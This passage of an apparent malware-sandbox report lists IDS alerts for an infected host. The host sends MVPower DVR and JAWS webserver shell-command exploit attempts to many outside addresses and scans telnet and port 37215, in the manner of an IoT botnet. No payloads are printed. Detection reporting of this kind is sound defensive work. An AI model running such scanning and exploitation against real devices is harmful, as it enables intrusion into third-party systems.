Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.109.117.106:80 -> 192.168.2.23:44014
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37630 -> 156.240.39.3:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47692
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44106 -> 139.162.229.143:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47352 -> 31.208.99.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37748 -> 104.18.66.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44106 -> 139.162.229.143:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37748 -> 104.18.66.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47352 -> 31.208.99.77:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47818
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56204 -> 195.225.34.29:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57852 -> 188.111.50.247:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56204 -> 195.225.34.29:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58694 -> 94.140.229.82:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57852 -> 188.111.50.247:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53436 -> 65.36.226.43:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34118 -> 76.200.91.184:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58694 -> 94.140.229.82:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56224 -> 192.119.107.248:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33204 -> 40.118.173.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53436 -> 65.36.226.43:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60454 -> 23.13.120.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58256 -> 206.189.155.223:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34118 -> 76.200.91.184:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35794 -> 156.67.65.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56224 -> 192.119.107.248:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33204 -> 40.118.173.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37096 -> 136.0.151.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60454 -> 23.13.120.245:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.13.120.245:80 -> 192.168.2.23:60454
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35794 -> 156.67.65.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38050 -> 139.99.197.232:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58256 -> 206.189.155.223:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37096 -> 136.0.151.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38050 -> 139.99.197.232:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33784 -> 51.255.48.130:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33784 -> 51.255.48.130:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47900
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48614 -> 195.224.198.148:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53482 -> 23.47.32.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48614 -> 195.224.198.148:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56958 -> 34.249.35.248:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53482 -> 23.47.32.31:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.47.32.31:80 -> 192.168.2.23:53482
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56958 -> 34.249.35.248:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38452 -> 54.255.225.69:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43500 -> 156.213.72.167:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34422 -> 102.22.248.62:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43500 -> 156.213.72.167:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54278 -> 54.254.184.145:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38452 -> 54.255.225.69:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34422 -> 102.22.248.62:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54278 -> 54.254.184.145:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34722 -> 13.230.241.127:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60100 -> 59.126.58.157:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34722 -> 13.230.241.127:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60100 -> 59.126.58.157:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56936 -> 118.214.30.19:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41974 -> 209.212.38.169:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44040 -> 35.177.236.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45564 -> 44.225.184.188:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40660 -> 23.5.198.5:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56936 -> 118.214.30.19:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 118.214.30.19:80 -> 192.168.2.23:56936
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44040 -> 35.177.236.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56000 -> 104.65.62.161:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58712 -> 67.192.246.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41974 -> 209.212.38.169:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56860 -> 23.210.205.99:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55890 -> 45.38.40.243:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56000 -> 104.65.62.161:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.65.62.161:80 -> 192.168.2.23:56000
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45564 -> 44.225.184.188:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40660 -> 23.5.198.5:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.5.198.5:80 -> 192.168.2.23:40660
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58712 -> 67.192.246.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56860 -> 23.210.205.99:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.210.205.99:80 -> 192.168.2.23:56860
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34924 -> 167.57.119.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55890 -> 45.38.40.243:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34924 -> 167.57.119.142:80

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35056
Source: unknown	Network traffic detected: HTTP traffic on port 42128 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35062
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35078
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35082
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35108
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35146
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35164
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35230
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35248
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35254
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35306
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35316
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35324
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35338
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35354
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35378
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35382
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35388
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35404
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35410
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35422
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35456
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35500
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35506
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45552
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45556
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45562
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45570
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45592
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45604
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45618
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45646
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45656
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45700
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45714
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45722
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45734
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45746
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45750
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45756
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45760
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45768
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45770
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45782
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45800
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45814
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45844
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45884
Source: unknown	Network traffic detected: HTTP traffic on port 34666 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34666
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215

Passes username and password via HTTP get

Source: global traffic

HTTP get: HTTP/1.1 200 OKConnection: closeContent-Type: text/htmlCache-Control:no-cachePragma:no-cacheExpires:wed, 10 Oct 1997 08:21:57 GMTData Raw: 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 6c 6f 67 6f 6e 49 6e 66 6f 20 3d 20 6e 65 77 20 41 72 72 61 79 28 0a 30 2c 0a 30 2c 30 29 3b 0a 76 61 72 20 67 5f 4c 61 6e 20 3d 20 33 33 32 3b 0a 76 61 72 20 67 5f 79 65 61 72 3d 32 30 31 39 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 20 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 70 72 61 67 6d 61 20 63 6f 6e 74 65 6e 74 3d 6e 6f 2d 63 61 63 68 65 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 65 78 70 69 72 65 73 20 63 6f 6e 74 65 6e 74 3d 22 77 65 64 2c 20 32 36 20 46 65 62 20 31 39 39 37 20 30 38 3a 32 31 3a 35 37 20 47 4d 54 22 3e 20 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 6f 55 72 6c 28 65 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 65 2c 22 22 2c 22 22 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 73 69 7a 65 28 65 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 2e 35 2a 28 74 2d 34 30 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 2e 73 74 79 6c 65 2e 74 6f 70 3d 2e 33 2a 28 6f 2d 33 30 30 29 7d 65 6c 73 65 7b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 2e 35 2a 28 74 2d 34 30 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 2e 73 74 79 6c 65 2e 74 6f 70 3d 2e 33 2a 28 6f 2d 33 30 30 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 6f 43 6c 65 61 72 28 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 6e 61 6d 65 22 29 2e 76 61 6c 75 65 3d 22 22 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 22 29 2e 76 61 6c 75 65 3d 22 22 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 70 61 73 73 77 6f 72 64 22 29 2e 76 61 6c 75 65 3d 22 22 2c 77 69 6e 64 6f 77 2e 66 6f 63 75 73 26 26 73 65 6c 66 2e 66 6f 63 75 73 28 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 6e 61 6d 65 22 29 2e 66 6f 63 75 73 28 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 6e 61 6d 65 22 29 2e 73 65 6c 65 63 74 28 29 2c 61 63 63 6f 75 6e 74 5f 72 65 73 74 6f 72 65 64 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 72 65 74 5f 69 6e 66 6f 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 53 50 41 4e 20 63 6c 61 73 73 3d 22 54 49 50 53

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.136.59.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.179.128.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.40.28.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.30.137.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.72.64.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.18.197.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.184.134.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.6.153.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.28.226.250:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.7.165.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.160.18.209:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.242.121.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.169.148.209:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.16.115.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.22.56.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.105.47.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.50.185.145:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.178.175.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.168.186.109:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.85.4.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.31.81.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.118.114.139:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.126.184.109:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.101.110.29:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.238.0.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.83.67.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.244.170.150:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.19.163.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.26.130.38:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.132.82.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.73.46.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.72.161.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.72.22.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.50.78.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.19.34.30:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.100.145.233:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.234.191.86:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.133.88.159:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.229.217.40:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.66.212.218:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.223.13.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.122.231.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.191.92.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.154.205.251:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.130.241.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.45.222.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.61.97.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.248.97.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.102.220.180:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.151.251.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.124.23.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.229.64.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.237.56.9:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.208.34.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.184.97.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.23.2.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.34.61.133:37215
